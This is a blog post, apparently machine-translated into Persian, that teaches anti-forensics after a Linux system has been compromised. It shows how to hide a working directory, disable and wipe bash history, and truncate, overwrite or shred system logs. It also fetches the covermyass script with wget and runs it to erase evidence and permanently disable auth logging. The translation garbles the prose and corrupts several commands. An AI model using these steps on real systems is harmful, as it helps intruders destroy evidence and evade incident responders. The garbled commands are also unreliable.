خانه / بلاگ / آرشیو بلاگ ماه های قدیمی / چگونه به حذف سیاهههای مربوط و تاریخ در لینوکس سیستم برای پوشش دادن آهنگ خود را & کشف نشده باقی می ماند

چگونه به حذف سیاهههای مربوط و تاریخ در لینوکس سیستم برای پوشش دادن آهنگ خود را & کشف نشده باقی می ماند

مرحله نهایی بهره برداری است پوشش آهنگ های خود را که شامل پاک کردن همه فعالیت و سیاهههای مربوط تا مهاجم می تواند برای جلوگیری از شناسایی شدن. این به ویژه مهم برای تداوم و اگر هدف این است که برای رفتن به دیده دوباره در آینده.

به شما نشان می دهد اصول اولیه پوشش خود را در آهنگ های ما سازش یک هدف اول و سپس بررسی برخی از تکنیک های مورد استفاده برای پاک کردن باش, تاریخچه حذف سیاهههای مربوط و پنهان باقی می ماند و پس از بهره برداری از یک سیستم لینوکس.

مرحله 1: سازش یک هدف

اولین چیزی که ما نیاز به انجام است که بهره برداری از این هدف است. ما می توانیم با استفاده از تزریق دستور به سوء استفاده از راه سرور دسته سیستم عامل دستورات به یک پوسته.

ما همچنین می خواهید به روز رسانی جدید ما پوسته به طور کامل تعاملی یکی. انجام این کار آن را آسان تر به کار به طور کلی, و آن را نیز به ما اجازه استفاده از برگه تکمیل و ترمینال تاریخ است.

پس از آن ما می تواند تشدید دسترسی ما به ریشه طوری که ما بهتر می تواند امکان استفاده از سیستم برای کشف نشده باقی می ماند.

مرحله 2: ایجاد یک آسان برای حذف پوشه مخفی

زمانی که ما دسترسی به ریشه ما می توانیم ایجاد یک پوشه مخفی به کار کردن و نگه داشتن هر گونه اسکریپت ها و یا فایل ها در. آن را نمی خواهد هر کسی احمق اما اکثر noobie admin اما لایه دیگری از اختیار قطعا نمی تواند صدمه دیده است. اول, اجازه دهید قرار دادن هر گونه قابل نوشتن دایرکتوری با دستور زیر:

root@target:/# find / -perm -222 -نوع d 2>/dev/null /dev/shm
/var/lock
/var/lib/php5
/var/tmp
/var/www/dav
/var/www/twiki/data/گودال ماسهبازی
/var/www/twiki/data/اصلی
/var/www/twiki/data/می دانم
/var/www/twiki/data/TWiki
/var/www/twiki/data/_default
/var/www/twiki/data/سطل زباله
/var/www/twiki/pub/گودال ماسهبازی
/var/www/twiki/pub/اصلی
/var/www/twiki/pub/می دانم
/var/www/twiki/pub/می دانم/IncorrectDllVersionW32PTH10DLL
/var/www/twiki/pub/TWiki
/var/www/twiki/pub/TWiki/TWikiDocGraphics
/var/www/twiki/pub/TWiki/TWikiTemplates
/var/www/twiki/pub/TWiki/TWikiLogos
/var/www/twiki/pub/TWiki/PreviewBackground
/var/www/twiki/pub/TWiki/FileAttachment
/var/www/twiki/pub/TWiki/WabiSabi
/var/www/twiki/pub/سطل زباله
/var/www/twiki/pub/icn
/tmp
/tmp/.یخ-یونیکس
/tmp/.X11-یونیکس

ما می توانیم ایجاد یک دایرکتوری با mkdir فرمان و prepending نام با یک نقطه:

root@target:/# mkdir /dev/shm/.راز

اگر ما لیست مطالب /dev/shm در حال حاضر هیچ چیز را نشان می دهد:

root@target:/# ls -l /dev/shm/ در کل 0

تنها زمانی که ما با استفاده از یک سوئیچ به لیست تمام فایل ها و دایرکتوری ها آن را نشان می دهد:

root@target:/# ls -la /dev/shm/ در کل 0
drwxrwxrwt 3 root root 60 2019-06-19 13:49 .
drwxr-xr-x 13 root root 13480 2019-06-19 13:41 ..
drwxr-xr-x 2 root root 40 2019-06-19 13:49 .راز

و برای حذف دایرکتوری هنگامی که ما به پایان رسید بر روی دستگاه با استفاده از rmdir فرمان:

root@target:/# rmdir /dev/shm/.راز/

مرحله 3: حذف تاریخچه باش

باش نگه می دارد یک لیست از دستورات مورد استفاده در این زمان, جلسه, در, حافظه, بنابراین مهم است که به حذف آن را برای پوشش دادن آهنگ خود را. ما می توانید نمایش زمان تاریخ با تاریخچه فرمان:

root@target:/# history 1 cd / 2 ls 3 find / -perm -222 -نوع d 2>/dev/null 4 cd /dev/shm/ 5 سی دی / 6 mkdir /dev/shm/.راز 7 ls -l /dev/shm/ 8 ls -la /dev/shm/ 9 ls 10 rmdir /dev/shm/.راز/ 11 تاریخچه

دستورات نوشته شده به HISTFILE محیط متغیر است که معمولا .bash_history. ما می توانیم اکو را به دیدن محل:

root@target:/# echo $HISTFILE /root/.bash_history

ما می توانیم با استفاده از ثابت نشده دستور به حذف متغیر:

root@target:/# unset HISTFILE

بنابراین هنگامی که ما اکو دوباره آن چیزی را نشان می دهد:

root@target:/# echo $HISTFILE

ما همچنین می توانید مطمئن شوید که فرمان تاریخچه ذخیره نمی شوند با ارسال آن به /dev/null. تنظیم متغیر به آن:

root@target:/# HISTFILE=/dev/null

و یا همین کار را با صادرات فرمان:

root@target:/# صادرات HISTFILE=/dev/null

و تاریخ در حال حاضر خواهد شد ارسال به /dev/null (هیچ جا):

root@target:/# echo $HISTFILE /dev/null

ما می توانید تعداد زیادی از دستورات ذخیره می شود در طول زمان جلسه به 0 با استفاده از این HISTSIZE متغیر:

root@target:/# HISTSIZE=0

استفاده از صادرات فرمان:

root@target:/# صادرات HISTSIZE=0

ما همچنین می توانید تغییر تعداد خطوط مجاز در تاریخچه فایل با استفاده از HISTFILESIZE متغیر است. این مجموعه را به 0:

root@target:/# HISTFILESIZE=0

و یا با صادرات:

root@target:/# صادرات HISTFILESIZE=0

این مجموعه فرمان را می توان مورد استفاده برای تغییر پوسته گزینه های به عنوان به خوبی. برای غیر فعال کردن این گزینه تاریخچه استفاده از دستور زیر:

root@target:/# مجموعه +o تاریخچه

و دوباره آن را فعال کنید:

root@target:/# مجموعه -o تاریخچه

به طور مشابه shopt فرمان را می توان مورد استفاده برای تغییر پوسته گزینه های. برای غیر فعال کردن تاریخچه استفاده از دستور زیر:

root@target:/# shopt -ou تاریخچه

و دوباره آن را فعال کنید:

root@target:/# shopt -تاریخچه سیستم عامل

در حالی که در حال اجرا دستورات در سیستم هدف ما گاهی اوقات می تواند جلوگیری از صرفه جویی در آنها را به تاریخ شروع این فرماندهی با یک پیشرو در فضا:

root@هدف:~# cat /etc/passwd

که روش کار نمی کند در همه زمان ها و بستگی به سیستم.

ما همچنین می توانید فقط پاک کردن تاریخچه استفاده از -c سوئیچ:

root@هدف:~# history -c

مطمئن شوید که تغییرات نوشته شده است به دیسک با استفاده از -w سوئیچ:

root@هدف:~# history -w

که تنها پاک کردن تاریخچه برای جلسه فعلی. کاملا مطمئن شوید که تاریخ پاک شده است هنگام خروج از جلسه دستور زیر را در دستی می آید:

root@target:/# cat /dev/null > ~/.bash_history && history-c && exit

ما همچنین می توانید با استفاده از کشتن فرمان به خروج از جلسه بدون صرفه جویی در تاریخچه:

root@target:/# kill -9 $$

گام 4: پاک کردن فایل ورود به سیستم

علاوه بر به هم زدن تاریخچه فایل های ورود به سیستم نیز نیاز به پاک برای کشف نشده باقی می ماند. در اینجا برخی از رایج فایل های ورود و چه آنها شامل:

  • /var/log/auth.ورود به سیستم احراز هویت
  • /var/log/cron.ورود به سیستم Cron Jobs
  • /var/log/maillog ایمیل
  • /var/log/httpd آپاچی

البته ما به سادگی می توانید حذف ورود به سیستم با کنترل از راه دور فرمان:

root@target:/# rm /var/log/auth.ورود به سیستم

اما این به احتمال زیاد خواهد شد بالا بردن پرچم قرمز بنابراین بهتر است برای خالی کردن فایل به جای پاک کردن آن به طور کامل. ما می توانیم با استفاده از کوتاه کردن فرمان به کوچک شدن اندازه 0:

root@target:/# کوتاه -s 0 /var/log/auth.ورود به سیستم

لطفا توجه داشته باشید کوتاه است که همیشه حاضر در تمام سیستم های.

ما می توانید انجام همان چیزی که با انعکاس هیچ چیز به فایل:

root@target:/# echo " > /var/log/auth.ورود به سیستم

و همچنین با > با خود برای خالی کردن فایل:

root@target:/# > /var/log/auth.ورود به سیستم

ما همچنین می توانید با ارسال آن به /dev/null:

root@target:/# cat /dev/null > /var/log/auth.ورود به سیستم

و یا استفاده از سه راهی فرمان:

root@target:/# واقعی | سه راهی /var/log/auth.ورود به سیستم

ما همچنین می توانید با استفاده از dd فرمان به نوشتن هیچ چیز به فایل ورود به سیستم:

root@target:/# dd if=/dev/null از=/var/log/auth.ورود به سیستم 0+0 سوابق در
0+0 ثبت
0 بایت (0 ب) کپی 6.1494 e-05 s 0.0 kB/s

این تکه تکه فرمان استفاده می شود به بازنویسی یک فایل با معنی و داده های باینری:

root@target:/# پاره /var/log/auth.ورود به سیستم

ما حتی می توانید رویه -zu که کوتاه کردن این فایل و بازنویسی آن با صفر برای پنهان کردن شواهد خرد:

root@target:/# پاره -zu /var/log/auth.ورود به سیستم

مرحله 5: استفاده از یک ابزار برای اطمینان از همه چیز پاک شده

برای افزایش شانس که هر گونه فعالیت بر روی هدف می رود کشف نشده ما می توانیم با استفاده از یک ابزار به مطمئن شوید که همه چیز پاک می شود. Covermyass یک اسکریپت است که به طور خودکار بسیاری از فرآیندهای ما در حال حاضر تحت پوشش از جمله پاکسازی فایل های ورود و ناتوان باش تاریخ است.

ما می توانید این اسکریپت را از GitHub استفاده از wget (با فرض اینکه ما دسترسی به اینترنت بر روی هدف در غیر این صورت آن را باید منتقل دستی):

root@target:/# wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass

سر به قابل نوشتن فهرست و استفاده از سطح دسترسی به آن را اجرایی:

root@target:/tmp# chmod +x covermyass

پس ما می توانیم آن را اجرا کنید:

root@target:/tmp# ./covermyass به انجمن خوش آمدید پوشش کون ابزار ! یک گزینه را انتخاب کنید : 1) پاک کردن سیاهههای مربوط به کاربر root
2) Permenently غیر فعال کردن تایید & bash تاریخچه
3) بازگرداندن تنظیمات به طور پیش فرض
99) خروج ابزار >

ما با توجه به سفارشی سریع با چند گزینه را انتخاب کنید. بیایید اول را انتخاب کنید یکی برای پاک کردن لاگ:

> 1 [+] /var/log/messages تمیز.
[+] /var/log/auth.ورود به سیستم تمیز.
[+] /var/log/کرن.ورود به سیستم تمیز.
[+] /var/log/wtmp تمیز.
[+] ~/.bash_history تمیز.
[+] تاریخچه فایل حذف شده است. یادآوری: شما نیاز به بازنگری در این جلسه به دیدن اثر.
نوع خروج به انجام این کار.

ما همچنین می توانید غیر فعال کردن باش و تایید سابقه با گزینه 2:

> 2 [+] به طور دائم در حال ارسال /var/log/auth.ورود به /dev/null
[+] به طور دائم ارسال bash_history به /dev/null
[+] مجموعه HISTFILESIZE & HISTSIZE به 0
[+] غیر فعال تاریخچه کتابخانه Permenently غیر فعال باش, ورود به سیستم.

و در صورتی که شما نیاز به پاک کردن همه چیز را در یک عجله به سادگی اضافه در حال حاضر به دستور:

root@target:/tmp# ./covermyass در حال حاضر [+] /var/log/messages تمیز.
[+] /var/log/کرن.ورود به سیستم تمیز.
[+] /var/log/wtmp تمیز.
[+] ~/.bash_history تمیز.
[+] تاریخچه فایل حذف شده است. یادآوری: شما نیاز به بازنگری در این جلسه به دیدن اثر.
نوع خروج به انجام این کار.

کاغذ بسته بندی

امروز ما به بررسی تکنیک های مختلف مورد استفاده قرار گیرد برای پوشش دادن آهنگ و کشف نشده باقی می ماند بر روی دستگاه به خطر بیافتد. ما تحت پوشش راه برای غیر فعال کردن و حذف باش, تاریخ, روش برای پاک کردن فایل ورود به سیستم و استفاده Covermyass ابزار برای اطمینان از فعالیت های ما بر روی هدف بود پاک کرد. وجود دارد راه های دیگر برای روشن شدن برخی آثار از یک حمله با استفاده از Metasploit استفاده از shell scripting یا انجام آن در یک هک ویندوز, ماشین, اما بالاتر باید همه چیز شما نیاز به یک پایه لینوکس کامپیوتر.

می خواهید شروع به ساختن پول به عنوان یک کلاه سفید هکر? پرش شروع خود را-کلاه سفید هک حرفه ای با ما 2020 حق بیمه هک اخلاقی, گواهینامه آموزشی از بسته نرم افزاری جدید Null Byte فروشگاه و دریافت بیش از 60 ساعت آموزش از هک اخلاقی حرفه ای است.

خرید در حال حاضر (96٪) >

تصویر جلد توسط Vojtech Okenka/Pexels


tinyurlis.gdclck.ruulvis.netshrtco.de